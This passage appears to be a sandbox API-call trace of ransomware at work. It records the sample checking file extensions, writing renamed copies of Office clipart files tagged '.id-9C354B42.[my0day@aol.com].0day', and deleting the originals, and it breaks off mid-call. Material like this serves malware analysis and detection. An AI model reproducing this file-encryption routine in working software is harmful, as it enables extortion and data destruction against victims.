[0270.444] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.444] lstrlenW (lpString=".doc") returned 4 [0270.444] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.444] lstrlenW (lpString=".docx") returned 5 [0270.445] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.445] lstrlenW (lpString=".pdf") returned 4 [0270.445] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.445] lstrlenW (lpString=".xls") returned 4 [0270.445] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.445] lstrlenW (lpString=".xlsx") returned 5 [0270.445] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.445] lstrlenW (lpString=".ppt") returned 4 [0270.445] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.445] lstrlenW (lpString=".zip") returned 4 [0270.445] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.445] lstrlenW (lpString=".rar") returned 4 [0270.445] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.445] lstrlenW (lpString=".bz2") returned 4 [0270.445] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.445] lstrlenW (lpString=".7z") returned 3 [0270.445] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.445] lstrlenW (lpString=".dbf") returned 4 [0270.445] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.445] lstrlenW (lpString=".1cd") returned 4 [0270.445] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.445] lstrlenW (lpString=".jpg") returned 4 [0270.445] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.445] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.445] lstrlenW (lpString="GRID_01.MID") returned 11 [0270.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0270.449] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=6331) returned 1 [0270.449] CloseHandle (hObject=0x2cc) returned 1 [0270.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 0x20 [0270.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.452] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.452] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0270.453] GetLastError () returned 0x0 [0270.453] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x18bb, lpOverlapped=0x0) returned 1 [0270.463] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x18c0, lpOverlapped=0x0) returned 1 [0270.464] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.464] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0270.464] SetEndOfFile (hFile=0x2c4) returned 1 [0270.464] CloseHandle (hObject=0x2c4) returned 1 [0270.464] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.464] SetEndOfFile (hFile=0x38c) returned 1 [0270.467] CloseHandle (hObject=0x38c) returned 1 [0270.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.467] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 1 [0270.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.467] lstrlenW (lpString=".doc") returned 4 [0270.468] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.468] lstrlenW (lpString=".docx") returned 5 [0270.468] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.468] lstrlenW (lpString=".pdf") returned 4 [0270.468] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.468] lstrlenW (lpString=".xls") returned 4 [0270.468] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.468] lstrlenW (lpString=".xlsx") returned 5 [0270.468] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.468] lstrlenW (lpString=".ppt") returned 4 [0270.468] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.468] lstrlenW (lpString=".zip") returned 4 [0270.468] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.468] lstrlenW (lpString=".rar") returned 4 [0270.468] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.468] lstrlenW (lpString=".bz2") returned 4 [0270.468] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.468] lstrlenW (lpString=".7z") returned 3 [0270.468] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.468] lstrlenW (lpString=".dbf") returned 4 [0270.468] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.468] lstrlenW (lpString=".1cd") returned 4 [0270.468] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.468] lstrlenW (lpString=".jpg") returned 4 [0270.468] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.469] lstrlenW (lpString=".doc") returned 4 [0270.469] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.469] lstrlenW (lpString=".docx") returned 5 [0270.469] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.469] lstrlenW (lpString=".pdf") returned 4 [0270.469] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.469] lstrlenW (lpString=".xls") returned 4 [0270.469] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.469] lstrlenW (lpString=".xlsx") returned 5 [0270.469] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.469] lstrlenW (lpString=".ppt") returned 4 [0270.469] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.469] lstrlenW (lpString=".zip") returned 4 [0270.469] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.469] lstrlenW (lpString=".rar") returned 4 [0270.469] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.469] lstrlenW (lpString=".bz2") returned 4 [0270.469] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.469] lstrlenW (lpString=".7z") returned 3 [0270.469] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.469] lstrlenW (lpString=".dbf") returned 4 [0270.469] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.469] lstrlenW (lpString=".1cd") returned 4 [0270.469] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0270.470] lstrlenW (lpString=".jpg") returned 4 [0270.470] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.470] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.470] lstrlenW (lpString="HTECH_01.MID") returned 12 [0270.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.470] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=7178) returned 1 [0270.470] CloseHandle (hObject=0x38c) returned 1 [0270.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 0x20 [0270.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.470] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.471] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0270.471] GetLastError () returned 0x0 [0270.471] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1c0a, lpOverlapped=0x0) returned 1 [0270.473] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1c10, lpOverlapped=0x0) returned 1 [0270.474] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.475] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.475] SetEndOfFile (hFile=0x2c4) returned 1 [0270.475] CloseHandle (hObject=0x2c4) returned 1 [0270.475] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.475] SetEndOfFile (hFile=0x38c) returned 1 [0270.478] CloseHandle (hObject=0x38c) returned 1 [0270.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 1 [0270.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.478] lstrlenW (lpString=".doc") returned 4 [0270.478] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.478] lstrlenW (lpString=".docx") returned 5 [0270.478] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.478] lstrlenW (lpString=".pdf") returned 4 [0270.478] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.478] lstrlenW (lpString=".xls") returned 4 [0270.478] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.478] lstrlenW (lpString=".xlsx") returned 5 [0270.478] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.478] lstrlenW (lpString=".ppt") returned 4 [0270.479] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.479] lstrlenW (lpString=".zip") returned 4 [0270.479] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.479] lstrlenW (lpString=".rar") returned 4 [0270.479] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.479] lstrlenW (lpString=".bz2") returned 4 [0270.479] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.479] lstrlenW (lpString=".7z") returned 3 [0270.479] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.479] lstrlenW (lpString=".dbf") returned 4 [0270.479] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.479] lstrlenW (lpString=".1cd") returned 4 [0270.479] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.480] lstrlenW (lpString=".jpg") returned 4 [0270.480] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.480] lstrlenW (lpString=".doc") returned 4 [0270.480] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.480] lstrlenW (lpString=".docx") returned 5 [0270.480] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.480] lstrlenW (lpString=".pdf") returned 4 [0270.480] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.480] lstrlenW (lpString=".xls") returned 4 [0270.480] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.480] lstrlenW (lpString=".xlsx") returned 5 [0270.480] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.480] lstrlenW (lpString=".ppt") returned 4 [0270.480] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.480] lstrlenW (lpString=".zip") returned 4 [0270.480] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.480] lstrlenW (lpString=".rar") returned 4 [0270.480] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.480] lstrlenW (lpString=".bz2") returned 4 [0270.480] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.480] lstrlenW (lpString=".7z") returned 3 [0270.480] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.480] lstrlenW (lpString=".dbf") returned 4 [0270.480] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.480] lstrlenW (lpString=".1cd") returned 4 [0270.480] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0270.480] lstrlenW (lpString=".jpg") returned 4 [0270.480] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.481] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.481] lstrlenW (lpString="INDST_01.MID") returned 12 [0270.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.482] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=8568) returned 1 [0270.482] CloseHandle (hObject=0x38c) returned 1 [0270.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid")) returned 0x20 [0270.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.482] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.482] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0270.482] GetLastError () returned 0x0 [0270.482] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x2178, lpOverlapped=0x0) returned 1 [0270.485] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x2180, lpOverlapped=0x0) returned 1 [0270.486] ReadFile (in: hFile=0x38c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.486] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.486] SetEndOfFile (hFile=0x2c4) returned 1 [0270.486] CloseHandle (hObject=0x2c4) returned 1 [0270.486] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.486] SetEndOfFile (hFile=0x38c) returned 1 [0270.488] CloseHandle (hObject=0x38c) returned 1 [0270.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.489] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid")) returned 1 [0270.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.489] lstrlenW (lpString=".doc") returned 4 [0270.489] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.489] lstrlenW (lpString=".docx") returned 5 [0270.489] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.489] lstrlenW (lpString=".pdf") returned 4 [0270.489] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.489] lstrlenW (lpString=".xls") returned 4 [0270.489] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.489] lstrlenW (lpString=".xlsx") returned 5 [0270.489] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.489] lstrlenW (lpString=".ppt") returned 4 [0270.489] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.489] lstrlenW (lpString=".zip") returned 4 [0270.489] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.490] lstrlenW (lpString=".rar") returned 4 [0270.490] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.490] lstrlenW (lpString=".bz2") returned 4 [0270.490] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.490] lstrlenW (lpString=".7z") returned 3 [0270.490] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.490] lstrlenW (lpString=".dbf") returned 4 [0270.490] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.490] lstrlenW (lpString=".1cd") returned 4 [0270.490] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.490] lstrlenW (lpString=".jpg") returned 4 [0270.490] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned 63 [0270.490] lstrlenW (lpString=".doc") returned 4 [0270.490] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.490] lstrlenW (lpString=".docx") returned 5 [0270.490] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.490] lstrlenW (lpString=".pdf") returned 4 [0270.490] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.490] lstrlenW (lpString=".xls") returned 4 [0270.490] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.490] lstrlenW (lpString=".xlsx") returned 5 [0270.490] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.490] lstrlenW (lpString=".ppt") returned 4 [0270.490] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 